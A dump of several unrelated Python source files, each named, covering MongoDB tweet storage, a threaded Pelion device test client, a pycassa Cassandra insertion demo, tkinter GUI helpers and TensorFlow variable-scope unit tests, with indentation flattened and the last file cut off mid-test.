"""SaraData"""
import queue
import threading
from sara.core.config import DATABASE as default_database
from sara.core.config import sara_files_path
from sara.core.mongo.db import get_client, load_database, load_tweets
from sara.core.sara_file.db import load_data, save_data_file
from sara.core.utils import create_path
tweets_queue = queue.Queue()
def storage_mongodb():
"""Queue to save data in MongoDB."""
while True:
tweet, connection = tweets_queue.get()
connection.replace_one(tweet, tweet, True)
tweets_queue.task_done()
# Use thread to save data in database.
threading.Thread(target=storage_mongodb, daemon=True).start()
class SaraData:
"""
Encapsule the backeend to store and load the data.
"""
def __init__(self, collection_name=None, database=None,
storage_type='mongodb'):
"""SaraData arguments, collection_name and storage_type."""
if database:
self.database = database
else:
# default database
self.database = default_database
self.collection = collection_name
# backend to store the data.
self.storage_type = storage_type
if 'mongodb' in self.storage_type:
print('using mongodb')
self.client = get_client()
elif 'sarafile' in storage_type:
print('using SaraFile')
self.sara_file_storage = f'{sara_files_path}/{self.collection}'
create_path(self.sara_file_storage)
def update_database(self, database):
"""Update database used."""
self.database = database
print(f'Database updated to {self.database}')
def get_tweets(self, number_tweets=None):
"""Get tweets.
if number_tweets is not defined, return all the database.
Return a list with tweets in JSON.
"""
if 'mongodb' in self.storage_type:
print("Use get_projected_data to load a big number of data.")
return load_tweets(self.database, self.collection, number_tweets)
if 'sqlite' in self.storage_type:
pass
if 'sarafile' in self.storage_type:
return load_data(self.collection)
return None
def get_projected_data(self, project, number_tweets):
"""Get filtered data"""
conn = load_database(self.client, self.database, self.collection)
return conn.find(projection=project).limit(number_tweets)
def get_filtered_tweet(self, proj_filter, project, number):
"""Get filtered data."""
conn = load_database(self.client, self.database, self.collection)
return conn.find(filter=proj_filter, projection=project).limit(number)
def count_recovered_documments(self, proj_filter, number):
"""Return number the elements returned by the query the Mongo."""
conn = load_database(self.client, self.database, self.collection)
recovered = conn.count_documents(proj_filter, limit=number)
return recovered
def save_data(self, data):
"""Save data."""
if 'mongodb' in self.storage_type:
conn = load_database(self.client, self.database, self.collection)
# to store in database
tweets_queue.put((data, conn))
if 'sarafile' in self.storage_type:
save_data_file(f'{self.sara_file_storage}/{self.collection}', data)
def get_all_collections(self):
"""Return all collections from a database."""
collections_list = []
if 'mongodb' in self.storage_type:
database = self.client[self.database].collection_names()
for collection_name in database:
collections_list.append(collection_name)
return collections_list
|
client_runner.py
|
"""
Copyright 2019-2020 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import deepcopy
import logging
import queue
import threading
from time import time
import pelion_test_lib.tools.utils as utils
flog = logging.getLogger('ClientRunner')
flog.setLevel(logging.DEBUG)
fh = logging.FileHandler('client.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(threadName)s:%(levelname)s: %(message)s')
fh.setFormatter(formatter)
flog.addHandler(fh)
log = logging.getLogger(__name__)
class Client:
"""
Client runner class that handles communication for given dut object
:param dut: Running client object
:param trace: Log the raw client output
:param name: Logging name for the client
"""
def __init__(self, dut, trace=False, name='0'):
self._ep_id = None
self.name = name
self.trace = trace
self.run = True
self.iq = queue.Queue()
self.dut = dut
input_thread_name = '<-- D{}'.format(name)
it = threading.Thread(target=self._input_thread, name=input_thread_name)
it.setDaemon(True)
log.info('Starting runner threads for client "D{}"'.format(self.name))
it.start()
def _input_thread(self):
"""
Runner's input thread
"""
while self.run:
line = self.dut.readline()
if line:
plain_line = utils.strip_escape(line)
if b'\r' in line and line.count(b'\r') > 1:
plain_line = plain_line.split(b'\r')[-2]
plain_line = plain_line.replace(b'\t', b' ').decode('utf-8', 'replace')
flog.info('<--|D{}| {}'.format(self.name, plain_line.strip()))
if self.trace:
log.debug('Raw output: {}'.format(line))
if b'Error' in line:
log.error('Output: {}'.format(line))
self.iq.put(plain_line)
else:
pass
def _read_line(self, timeout):
"""
Read data from input queue
:param timeout: Timeout
:return: Data from queue
"""
return self.iq.get(timeout=timeout)
def clear_input(self):
"""
Clear input queue messages
"""
with self.iq.mutex:
self.iq.queue.clear()
def kill(self):
"""
Kill the client runner
"""
log.debug('Killing client "D{}" runner...'.format(self.name))
self.run = False
def reset(self):
"""
Send reset to client
"""
self.dut.reset()
def endpoint_id(self, wait_for_response=10):
"""
Get endpoint id from client
:param wait_for_response: Timeout waiting the response
:return: Endpoint id
"""
if self._ep_id is None:
ep_id = self.wait_for_output('Device Id:', wait_for_response)
if ep_id is not None:
ep_array = ep_id.split()
if len(ep_array) > 1:
self._ep_id = ep_array[2]
return self._ep_id
def wait_for_output(self, search, timeout=60, assert_errors=True, ignore_case=True, errors=None):
"""
Wait for expected output response
:param search: Expected response string
:param timeout: Response waiting time
:param assert_errors: Assert on error situations
:param ignore_case: Ignore client output's casing
:param errors: String(s) that should cause error
:return: Response line with expected string or None if either line containing
one of the errors strings was found or timeout was reached (and assert_errors was False)
"""
if errors is None:
errors = []
elif isinstance(errors, str):
errors = [errors]
if ignore_case:
search = search.lower()
errors = deepcopy(errors)
for i, error in enumerate(errors):
errors[i] = error.lower()
return self._do_wait_for_output(search, errors, timeout, assert_errors, ignore_case)
def _do_wait_for_output(self, search, errors, timeout, assert_errors, ignore_case):
start = time()
now = 0
time_to_wait = timeout
timeout_error_msg = 'Didn\'t find {} in {} s'.format(search, time_to_wait)
while True:
try:
line = self._read_line(1)
if line:
if ignore_case:
line = line.lower()
if search in line:
end = time()
log.debug('Expected string "{}" found! [time][{:.4f} s]'.format(search, end - start))
return line
for error in errors:
if error in line:
end = time()
log.debug('Expected error string "{}" found! [time][{:.4f} s]'.format(error, end - start))
break
else:
continue
if assert_errors:
assert False, 'Error string found from line "{}"'.format(line)
else:
return None
else:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
except queue.Empty:
last = now
now = time()
if now - start >= timeout:
if assert_errors:
assert False, timeout_error_msg
else:
log.warning(timeout_error_msg)
break
if now - last > 1:
log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(search,
abs(now - start - timeout)))
|
ch3_2.3.1_time_series1.py
|
#! /usr/bin/env python
'''
Demonstrates how simple group can be used as one-to-many
relationship using a column family
'''
import util
from pycassa.columnfamily import ColumnFamily
from pycassa.types import *
import time
from threading import Thread
import json
import datetime
import random
# Load data from data/movies
def loadData():
events = util.readCSV('data/events.csv')
eventsList = []
for event in events:
e = {
'user': event[0],
'page': event[1],
'event': event[2],
'element': event[3]
}
eventsList.append(e)
for i in range(2):
t = Thread(target=randomEvent, args=(i, eventsList))
t.start()
def randomEvent(i, events):
event = random.choice(events)
con = util.getConnection()
eventsCF = ColumnFamily(con, 'event_log')
for j in range(50):
event = random.choice(events)
rowkey = event['user']
timestamp = datetime.datetime.utcnow()
colval = json.dumps(event)
print '[Thread:{3}] Inserting: [{0}=> {{{1}:{2}}}]'.format(rowkey, timestamp, colval, i)
eventsCF.insert(rowkey, {timestamp: colval})
time.sleep(0.1) #100 milliseconds
print 'finishished insertion.'
con.dispose()
def getByTag(tag):
print '''-- MOVIES GROUPED BY USER FOR A GIVE TAG --'''
print '''tag: {}'''.format(tag)
con = util.getConnection()
tagCF = ColumnFamily(con, 'tag_videos_composite')
movies = tagCF.get(tag.strip().lower())
for key, val in movies.iteritems():
compositeCol = key
print '([{0}],[{1}]) => {2}'.format(compositeCol[0], compositeCol[1], val)
movieSlice = tagCF.get(tag.strip().lower(), column_start=("Kara", "The Croods:Kara"), column_finish=("Sally","Gx" ))
#movieSlice = tagCF.get(tag.strip().lower(), column_start=("Kara", ), column_finish=(("Leo Scott",False),))
print '-- SLICES --'
for key, val in movieSlice.iteritems():
compositeCol = key
print '([{0}],[{1}]) => {2}'.format(compositeCol[0], compositeCol[1], val)
con.dispose()
if __name__ == '__main__':
loadData()
#getByTag('action')
|
__init__.py
|
"""Gui related classes"""
import threading
from queue import Queue, Empty
from tkinter import *
from tkinter.ttk import *
from tkinter.filedialog import askopenfilename
from tkinter.simpledialog import Dialog
class UiRoot(Tk):
def __init__(self):
Tk.__init__(self)
self._queue = Queue()
self._processQueue()
def run(self, func):
"""Post functions to run them on the main thread"""
self._queue.put(func)
def _processQueue(self):
while True:
try:
self._queue.get(block=False)()
except Empty:
break
self.after(100, self._processQueue)
class UiFrame(Frame):
def run(self, func):
self.master.run(func)
class UiDialog(Dialog):
def run(self, func):
self.master.run(func)
def buttonbox(self):
pass
class BackgroundTask(object):
"""Similar to Android's AsyncTask"""
def __init__(self, ui):
self.ui = ui
def doBefore(self):
"""Runs on the main thread, returns arg"""
pass
def do(self, arg):
"""Runs on a separate thread, returns result"""
pass
def doAfter(self, result):
"""Runs on the main thread again"""
pass
def run(self):
"""Invoke this on the main thread only"""
arg = self.doBefore()
threading.Thread(target=self._onThread, args=[arg]).start()
def _onThread(self, arg):
result = self.do(arg)
self.ui.run(lambda: self.doAfter(result))
class ScrollingText(Frame):
"""A wrapper for a Text widget with a scrollbar"""
def __init__(self, parent):
Frame.__init__(self, parent)
Grid.columnconfigure(self, 0, weight=1)
Grid.rowconfigure(self, 0, weight=1)
self.scrollbar = Scrollbar(self)
self.scrollbar.grid(row=0, column=1, sticky=N+S)
self.text = Text(self, yscrollcommand=self.scrollbar.set)
self.text.grid(row=0, column=0, sticky=N+S+W+E)
self.scrollbar.config(command=self.text.yview)
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "tower0/foo/v/Assign" ... is not an element of
# this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertAllEqual([v1, v2], [v3, v4])
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "v4/Assign" ... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "xx0/Assign" ...is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(alive): support variable partitioning/caching in eager mode.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual(1, sess.run(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual([1], sess.run(v1))
sess.run(v2.initializer)
self.assertEqual([2], sess.run(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
